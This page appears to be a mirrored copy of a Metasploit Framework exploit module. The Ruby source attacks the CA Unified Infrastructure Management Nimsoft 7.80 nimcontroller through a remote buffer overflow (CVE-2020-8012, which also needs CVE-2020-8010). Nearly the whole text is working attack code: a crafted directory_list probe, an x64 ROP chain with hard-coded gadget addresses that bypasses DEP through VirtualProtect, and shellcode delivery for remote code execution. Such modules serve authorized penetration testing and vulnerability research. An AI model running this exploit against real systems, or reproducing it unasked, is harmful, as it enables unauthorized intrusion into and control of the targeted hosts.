Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/nimsoft/nimcontroller_bof.rb
31979 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  prepend Msf::Exploit::Remote::AutoCheck

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.

19
          The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list

20
          probe.

21


22
          Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the

23
          directory_list probe.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'wetw0rk' # Vulnerability Discovery and Metasploit module

28
        ],

29
        'References' => [

30
          [ 'CVE', '2020-8010' ], # CA UIM Probe Improper ACL Handling RCE (Multiple Attack Vectors)

31
          [ 'CVE', '2020-8012' ], # CA UIM nimbuscontroller Buffer Overflow RCE

32
          [ 'URL', 'https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832' ],

33
          [ 'PACKETSTORM', '156577' ]

34
        ],

35
        'DefaultOptions' => {

36
          'EXITFUNC' => 'process',

37
          'AUTORUNSCRIPT' => 'post/windows/manage/migrate'

38
        },

39
        'Payload' => {

40
          'Space' => 2000,

41
          'DisableNops' => true

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          [

46
            'Windows Universal (x64) - v7.80.3132',

47
            {

48
              'Platform' => 'win',

49
              'Arch' => [ARCH_X64],

50
              'Version' => '7.80 [Build 7.80.3132, Jun  1 2015]',

51
              'Ret' => 0x000000014006fd3d # pop rsp; or al, 0x00; add rsp, 0x0000000000000448 ; ret [controller.exe]

52
            }

53
          ],

54
        ],

55
        'Privileged' => true,

56
        'Notes' => {

57
          'Stability' => [ CRASH_SAFE ],

58
          'Reliability' => [ REPEATABLE_SESSION ],

59
          'SideEffects' => [ ]

60
        },

61
        'DisclosureDate' => '2020-02-05',

62
        'DefaultTarget' => 0

63
      )

64
    )

65


66
    register_options(

67
      [

68
        OptString.new('DIRECTORY', [false, 'Directory path to obtain a listing', 'C:\\']),

69
        Opt::RPORT(48000),

70
      ]

71
    )

72
  end

73


74
  # check: there are only two prerequisites to getting code execution. The version number

75
  # and access to the directory_list probe. The easiest way to get this information is to

76
  # ask nicely ;)

77
  def check

78
    connect

79


80
    sock.put(generate_probe('get_info', ['interfaces=0']))

81
    response = sock.get_once(4096)

82


83
    unless response

84
      return CheckCode::Unknown('No response was returned from the target.')

85
    end

86


87
    list_check = -1

88


89
    begin

90
      if target['Version'].in? response

91
        print_status("Version #{target['Version']} detected, sending directory_list probe")

92
        sock.put(generate_probe('directory_list', ["directory=#{datastore['DIRECTORY']}", 'detail=1']))

93
        list_check = parse_listing(sock.get_once(4096), datastore['DIRECTORY'])

94
      end

95
    ensure

96
      disconnect

97
    end

98


99
    if list_check == 0

100
      return CheckCode::Appears

101
    else

102
      return CheckCode::Safe

103
    end

104
  end

105


106
  def exploit

107
    connect

108


109
    shellcode = make_nops(500)

110
    shellcode << payload.encoded

111


112
    offset = rand_text_alphanumeric(1000)

113
    offset += "\x0f" * 33

114


115
    heap_flip = [target.ret].pack('Q<*')

116


117
    alignment = rand_text_alphanumeric(7) # Adjustment for the initial chain

118
    rop_chain = generate_rsp_chain # Stage1: Stack alignment

119
    rop_chain += rand_text_alphanumeric(631) # Adjust for second stage

120
    rop_chain += generate_rop_chain # Stage2: GetModuleHandleA, GetProcAddressStub, VirtualProtectStub

121
    rop_chain += rand_text_alphanumeric((3500 - # ROP chain MUST be 3500 bytes, or exploitation WILL fail

122
      rop_chain.length

123


124
                                        ))

125
    rop_chain += "kernel32.dll\x00"

126
    rop_chain += "VirtualProtect\x00"

127


128
    trigger = "\x10" * (8000 - (

129
      offset.length +

130
      heap_flip.length +

131
      alignment.length +

132
      rop_chain.length +

133
      shellcode.length

134
    )

135
                       )

136


137
    buffer = offset + heap_flip + alignment + rop_chain + shellcode + trigger

138
    exploit_packet = generate_probe(

139
      'directory_list',

140
      ["directory=#{buffer}"]

141
    )

142


143
    sock.put(exploit_packet)

144


145
    disconnect

146
  end

147


148
  # generate_rsp_chain: This chain will re-align RSP / Stack, it MUST be a multiple of 16 bytes

149
  # otherwise our call will fail. I had VP work 50% of the time when the stack was unaligned.

150
  def generate_rsp_chain

151
    rop_gadgets = [0x0000000140018c42] * 20 # ret

152
    rop_gadgets += [

153
      0x0000000140002ef6, # pop rax ; ret

154
      0x00000001401a3000, # *ptr to handle reference ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE )

155
      0x00000001400af237, # pop rdi ; ret

156
      0x0000000000000007, # alignment for rsp

157
      0x0000000140025dab

158
    ] # add esp, edi ; adc byte [rax], al ; add rsp, 0x0000000000000278 ; ret

159


160
    return rop_gadgets.pack('Q<*')

161
  end

162


163
  # generate_rop_chain: This chain will craft function calls to GetModuleHandleA, GetProcAddressStub,

164
  # and finally VirtualProtectStub. Once completed, we have bypassed DEP and can get code execution.

165
  # Since we dynamically generate VirtualProtectStub, we needn't worry about other OS's.

166
  def generate_rop_chain

167
    # RAX -> HMODULE GetModuleHandleA(

168
    #   ( RCX == *module ) LPCSTR lpModuleName,

169
    # );

170
    rop_gadgets = [0x0000000140018c42] * 15 # ret

171
    rop_gadgets += [

172
      0x0000000140002ef6, # pop rax ; ret

173
      0x0000000000000000, # (zero out rax)

174
      0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret

175
      0x0000000000000000, #

176
      0x0000000000000000, #

177
      0x0000000000000000, #

178
      0x0000000000000000, #

179
      0x0000000000000000, #

180
      0x0000000000000000

181
    ]

182
    rop_gadgets += [0x0000000140018c42] * 10 # ret

183
    rop_gadgets += [

184
      0x0000000140131643, # pop rcx ; ret

185
      0x00000000000009dd, # offset to "kernel32.dll"

186
      0x000000014006d8d8

187
    ] # add rax, rcx ; add rsp, 0x38 ; ret

188


189
    rop_gadgets += [0x0000000140018c42] * 15 # ret

190


191
    rop_gadgets += [0x00000001400b741b] # xchg eax, ecx ; ret

192
    rop_gadgets += [

193
      0x0000000140002ef6, # pop rax ; ret

194
      0x000000014015e310, # GetModuleHandleA (0x00000000014015E330-20)

195
      0x00000001400d1161

196
    ] # call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret

197
    rop_gadgets += [0x0000000140018c42] * 17 # ret

198


199
    # RAX -> FARPROC GetProcAddressStub(

200
    #   ( RCX == &addr    ) HMODULE hModule,

201
    #   ( RDX == *module  ) lpProcName

202
    # );

203
    rop_gadgets += [

204
      0x0000000140111c09, # xchg rax, r11 ; or al, 0x00 ; ret (backup &hModule)

205
      0x0000000140002ef6, # pop rax ; ret

206
      0x0000000000000000, # (zero out rax)

207
      0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret

208
      0x0000000000000000, #

209
      0x0000000000000000, #

210
      0x0000000000000000, #

211
      0x0000000000000000, #

212
      0x0000000000000000, #

213
      0x0000000000000000

214
    ]

215
    rop_gadgets += [0x0000000140018c42] * 10 # ret

216
    rop_gadgets += [

217
      0x0000000140131643, # pop rcx ; ret

218
      0x0000000000000812, # offset to "virtualprotectstub"

219
      0x000000014006d8d8

220
    ] # add rax, rcx ; add rsp, 0x38 ; ret

221
    rop_gadgets += [0x0000000140018c42] * 15 # ret

222
    rop_gadgets += [0x0000000140135e39] # mov edx, eax ; mov rbx, qword [rsp+0x30] ; mov rbp, qword [rsp+0x38] ; mov rsi, qword [rsp+0x40]

223
    # mov rdi, qword [rsp+0x48] ; mov eax, edx ; add rsp, 0x20 ; pop r12 ; ret

224


225
    rop_gadgets += [0x0000000140018c42] * 10 # ret

226
    rop_gadgets += [0x00000001400d1ab8] # mov rax, r11 ; add rsp, 0x30 ; pop rdi ; ret

227
    rop_gadgets += [0x0000000140018c42] * 10 # ret

228
    rop_gadgets += [0x0000000140111ca1] # xchg rax, r13 ; or al, 0x00 ; ret

229
    rop_gadgets += [

230
      0x00000001400cf3d5, # mov rcx, r13 ; mov r13, qword [rsp+0x50] ; shr rsi, cl ; mov rax, rsi ; add rsp, 0x20 ; pop rdi ; pop rsi ; pop rbp ; ret

231
      0x0000000000000000, #

232
      0x0000000000000000, #

233
      0x0000000000000000

234
    ]

235
    rop_gadgets += [0x0000000140018c42] * 6 # ret

236
    rop_gadgets += [

237
      0x0000000140002ef6, # pop rax ; ret

238
      0x000000014015e318

239
    ] # GetProcAddressStub (0x00000000014015e338-20)

240
    rop_gadgets += [0x00000001400d1161] # call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret

241
    rop_gadgets += [0x0000000140018c42] * 17 # ret

242


243
    # RAX -> BOOL VirtualProtectStub(

244
    #   ( RCX == *shellcode          ) LPVOID  lpAddress,

245
    #   ( RDX == len(shellcode)      ) SIZE_T  dwSize,

246
    #   ( R8  == 0x0000000000000040  ) DWORD   flNewProtect,

247
    #   ( R9  == *writeable location ) PDWORD  lpflOldProtect,

248
    # );

249
    rop_gadgets += [

250
      0x0000000140111c09, # xchg rax, r11 ; or al, 0x00 ; ret (backup *VirtualProtectStub)

251
      0x000000014013d651, # pop r12 ; ret

252
      0x00000001401fb000, # *writeable location ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE )

253
      0x00000001400eba74

254
    ] # or r9, r12 ; mov rax, r9 ; mov rbx, qword [rsp+0x50] ; mov rbp, qword [rsp+0x58] ; add rsp, 0x20 ; pop r12 ; pop rdi ; pop rsi ; ret

255
    rop_gadgets += [0x0000000140018c42] * 10 # ret

256
    rop_gadgets += [

257
      0x0000000140002ef6, # pop rax ; ret

258
      0x0000000000000000

259
    ]

260
    rop_gadgets += [

261
      0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret

262
      0x0000000000000000, #

263
      0x0000000000000000, #

264
      0x0000000000000000, #

265
      0x0000000000000000, #

266
      0x0000000000000000, #

267
      0x0000000000000000

268
    ]

269
    rop_gadgets += [0x0000000140018c42] * 10 # ret

270
    rop_gadgets += [

271
      0x0000000140131643, # pop rcx ; ret

272
      0x000000000000059f, # (offset to *shellcode)

273
      0x000000014006d8d8

274
    ] # add rax, rcx ; add rsp, 0x38 ; ret

275
    rop_gadgets += [0x0000000140018c42] * 15 # ret

276
    rop_gadgets += [0x00000001400b741b] # xchg eax, ecx ; ret

277
    rop_gadgets += [

278
      0x00000001400496a2, # pop rdx ; ret

279
      0x00000000000005dc

280
    ] # dwSize

281
    rop_gadgets += [

282
      0x00000001400bc39c, # pop r8 ; ret

283
      0x0000000000000040

284
    ] # flNewProtect

285
    rop_gadgets += [0x00000001400c5f8a] # mov rax, r11 ; add rsp, 0x38 ; ret (RESTORE VirtualProtectStub)

286
    rop_gadgets += [0x0000000140018c42] * 17 # ret

287
    rop_gadgets += [0x00000001400a0b55] # call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h]

288
    # mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret

289


290
    rop_gadgets += [0x0000000140018c42] * 20 # ret

291


292
    rop_gadgets += [

293
      0x0000000140002ef6, # pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE)

294
      0x0000000000000000, # (zero out rax)

295
      0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret

296
      0x0000000000000000, #

297
      0x0000000000000000, #

298
      0x0000000000000000, #

299
      0x0000000000000000, #

300
      0x0000000000000000, #

301
      0x0000000000000000

302
    ]

303
    rop_gadgets += [0x0000000140018c42] * 10 # ret

304
    rop_gadgets += [

305
      0x0000000140131643, # pop rcx ; ret

306
      0x0000000000000317, # (offset to our shellcode)

307
      0x000000014006d8d8

308
    ] # add rax, rcx ; add rsp, 0x38 ; ret

309
    rop_gadgets += [0x0000000140018c42] * 15 # ret

310
    rop_gadgets += [0x00000001400a9747] # jmp rax

311
    rop_gadgets += [0x0000000140018c42] * 20 # ret (do not remove)

312


313
    return rop_gadgets.pack('Q<*')

314
  end

315


316
  # parse_listing: once the directory_list probe is sent we're returned a directory listing

317
  # unfortunately it's hard to read this simply "decodes" it

318
  def parse_listing(response, directory)

319
    result = { 'name' => '', 'date' => '', 'size' => '', 'type' => '' }

320
    i = 0

321


322
    begin

323
      dirlist = response.split('\x00')[0].split("\x00")

324
      index = dirlist.index('entry') + 3

325
      final = dirlist[index..]

326
    rescue StandardError

327
      print_error('Failed to gather directory listing')

328
      return -1

329
    end

330


331
    print_line("\n Directory of #{directory}\n")

332


333
    check = 0

334
    name = 0

335
    ftime = 0

336
    size = 0

337
    ftype = 0

338


339
    while i < final.length

340


341
      if name == 1 && final[i].to_i <= 0

342
        result['name'] = final[i]

343
        name = 0

344
        check += 1

345
      end

346
      if size >= 1

347
        if size == 3

348
          result['size'] = final[i]

349
          size = 0

350
          check += 1

351
        else

352
          size += 1

353
        end

354
      end

355
      if ftype >= 1

356
        if ftype == 3

357
          result['type'] = final[i]

358
          ftype = 0

359
          check += 1

360
        else

361
          ftype += 1

362
        end

363
      end

364
      if ftime >= 1

365
        if ftime == 3

366
          result['date'] = final[i]

367
          ftime = 0

368
          check += 1

369
        else

370
          ftime += 1

371
        end

372
      end

373


374
      if final[i].include? 'name'

375
        name = 1

376
      end

377
      if final[i].include? 'size'

378
        size = 1

379
      end

380
      if final[i].include? 'size'

381
        ftype = 1

382
      end

383
      if final[i].include? 'last_modified'

384
        ftime = 1

385
      end

386


387
      i += 1

388


389
      next unless check == 4

390


391
      if result['type'] == '2'

392
        result['type'] = ''

393
      else

394
        result['type'] = '<DIR>'

395
        result['size'] = ''

396
      end

397


398
      begin

399
        time = Time.at(result['date'].to_i)

400
        timestamp = time.strftime('%m/%d/%Y %I:%M %p')

401
      rescue StandardError

402
        timestamp = '??/??/???? ??:?? ??'

403
      end

404


405
      print_line(format('%20<timestamp>s %6<type>s %<name>s', timestamp: timestamp, type: result['type'], name: result['name']))

406


407
      check = 0

408
    end

409
    print_line('')

410
    return 0

411
  end

412


413
  # generate_probe: The nimcontroller utilizes the closed source protocol nimsoft so we need to specially

414
  # craft probes in order for the controller to accept any input.

415
  def generate_probe(probe, args)

416
    client = "#{rand_text_alphanumeric(14)}\x00"

417
    packet_args = ''

418
    probe += "\x00"

419


420
    for arg in args

421


422
      c = ''

423
      i = 0

424


425
      while c != '='

426


427
        c = arg[i]

428
        i += 1

429


430
      end

431


432
      packet_args << "#{arg[0, (i - 1)]}\x00"

433
      packet_args << "1\x00#{arg[i..].length + 1}\x00"

434
      packet_args << "#{arg[i..]}\x00"

435


436
    end

437


438
    packet_header = 'nimbus/1.0 ' # nimbus header (length of body) (length of args)

439
    packet_body = "mtype\x00" # mtype

440
    packet_body << "7\x004\x00100\x00" # 7.4.100

441
    packet_body << "cmd\x00" # cmd

442
    packet_body << "7\x00#{probe.length}\x00" # 7.(length of probe)

443
    packet_body << probe # probe

444
    packet_body << "seq\x00" # seq

445
    packet_body << "1\x002\x000\x00" # 1.2.0

446
    packet_body << "ts\x00" # ts

447
    packet_body << "1\x0011\x00#{rand_text_alphanumeric(10)}\x00" # 1.11.(UNIX EPOCH TIME)

448
    packet_body << "frm\x00" # frm

449
    packet_body << "7\x00#{client.length}\x00" # 7.(length of client)

450
    packet_body << client # client address

451
    packet_body << "tout\x00" # tout

452
    packet_body << "1\x004\x00180\x00" # 1.4.180

453
    packet_body << "addr\x00" # addr

454
    packet_body << "7\x000\x00" # 7.0

455
    #

456
    # probe packet arguments (dynamic)

457
    # argument

458
    # length of arg value

459
    # argument value

460


461
    packet_header << "#{packet_body.length} #{packet_args.length}\r\n"

462
    probe = packet_header + packet_body + packet_args

463


464
    return probe

465
  end

466


467
end

468


469